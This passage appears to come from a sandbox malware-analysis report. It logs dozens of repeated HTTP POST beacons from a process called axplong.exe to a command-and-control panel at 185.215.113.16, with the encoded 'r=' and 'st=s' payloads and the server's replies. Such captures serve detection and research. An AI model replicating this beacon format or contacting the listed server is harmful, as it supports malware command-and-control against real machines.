                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:53.935012102 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:54.172363043 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          47 | 192.168.2.4 | 55697 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:54.290257931 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:55.040893078 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:55.041682959 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:55.270845890 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          48 | 192.168.2.4 | 55698 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:55.384109020 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:56.093096018 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:56.094094992 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:56.320708990 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          49 | 192.168.2.4 | 55699 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:56.432461977 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:57.150849104 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:57.153429985 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:57.382288933 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          50 | 192.168.2.4 | 55700 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:57.493696928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:58.201766014 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:58.202657938 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:58.435995102 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          51 | 192.168.2.4 | 55701 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:58.555748940 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:59.249171972 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:59.250042915 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:59.473507881 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          52 | 192.168.2.4 | 55702 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:59.587268114 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:00.296009064 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:00.296989918 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:00.523525953 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          53 | 192.168.2.4 | 55703 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:00.635102034 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:01.370619059 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:01.374037027 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:01.602348089 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          54 | 192.168.2.4 | 55704 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:01.712519884 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:02.426134109 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:02.426983118 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:02.784313917 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          55 | 192.168.2.4 | 55705 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:02.901293039 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:03.600759029 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          56 | 192.168.2.4 | 55706 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:03.611223936 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:04.307177067 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          57 | 192.168.2.4 | 55707 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:04.420551062 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:05.139678955 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:05.153896093 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:05.382577896 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          58 | 192.168.2.4 | 55708 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:05.496049881 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:06.197098017 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          59 | 192.168.2.4 | 55709 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:06.206257105 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:07.033999920 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          60 | 192.168.2.4 | 55710 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:07.157963037 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:07.851278067 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:08.083271980 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          61 | 192.168.2.4 | 55711 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:08.085304022 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:08.792346001 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          62 | 192.168.2.4 | 55712 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:08.902327061 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:09.606389046 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:09.611402035 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:09.839040995 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          63 | 192.168.2.4 | 55713 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:10.652206898 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
